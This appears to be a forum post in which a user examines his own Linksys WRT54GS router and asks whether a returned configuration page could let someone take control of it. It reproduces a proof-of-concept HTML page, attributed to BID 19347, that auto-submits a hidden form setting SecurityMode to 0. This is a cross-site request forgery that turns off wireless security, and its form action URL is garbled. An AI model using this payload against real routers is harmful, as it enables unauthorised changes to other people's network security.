hiya all, I’m looking at the security on my router, and think I may have found a chink in its armour!
Unfortunately I know not much about javascript and would like some opinions of seasoned javascript guys n gals to tell me whether there is anything worth concerning myself about here.
I first sent a request over the router for this page (actually it was held locally, but the router returned some odd stuff, see later) :-
<html>
<head><title>BID 19347 specially-crafted html page – vuln found by
Ginsu Rabbit</title></head>
<body>
<form action=”
<input type=”hidden” name=”SecurityMode” value=”0″>
<input type=”hidden” name=”layout” value=”en”>
</form>
<script>document.forms[0].submit();</script>
</body>
</html>
as you can see in the source, someone else wrote it ? the original had a line
<form action=”
note I changed a 0 to a 1 because the original i.p. didn’t match the i.p. my router reported, anyway, once it was requested, rather than the usual server error page, I got sent to one named “security.tri”, the server requested name and password as usual, but leaving blank, pressing enter and looking at the source of the following page gave me this…
<html>
<head>
<meta http-equiv=”expires” content=”0″>
<meta http-equiv=”cache-control” content=”no-cache”>
<meta http-equiv=”pragma” content=”no-cache”>
<meta http-equiv=Content-Type content=”text/html; charset=iso-8859-1″>
<SCRIPT language=”javascript” type=”text/javascript” src=”share.js”></SCRIPT>
<SCRIPT language=JavaScript>
var submit_button = ‘WSecurity.htm’;
function to_submit()
{
if(submit_button == “”){
history.go(-1);
}
else if(submit_button == “WL_WEPTable.asp”){
self.close();
}
else if(submit_button == “FacdefClose”){
self.close();
}
else
location.replace(submit_button);
/*document.location.href = submit_button;
}
function init()
{
document.forms[0].action.value=sbutton.continue1;
if(submit_button == “”){
document.apply.action.value =sbutton.continue1;
}
else if(submit_button == “WL_WEPTable.asp”){
document.apply.action.value =sbutton.continue1;
}
else if(submit_button == “FacdefClose”){
document.apply.action.value =sbutton.close;
}
else
document.apply.action.value =sbutton.continue1;
}
function Capture(obj)
{
document.write(obj);
}
</SCRIPT>
</head>
<body bgcolor=”black” onload=init()>
<FORM name=apply method=post>
<center><table BORDER=0 CELLSPACING=0 CELLPADDING=0 WIDTH=557 >
<tr BGCOLOR=”white”>
<th HEIGHT=400><font face=”Verdana” size=4 color=”black”><script>Capture(other.setsuc)</script></font>
<p><p>
<script language=”javascript”>
document.write(“<input type=’button’ name=’action’ OnClick=to_submit() value=”+sbutton.continue1+”>”)
</script>
</th>
</tr>
</table></center>
</form>
</body>
Now, I don’t, as I mentioned i think, I don’t know much javascript, however, would anyone with a decent knowledge of javascript be able to use this unusual page to gain, say, control of the router?
I await with interest the views and opinions of some wise javascript gurus ?
the router in question is a wrt54gs if that is any help ?
thanks in advance
dave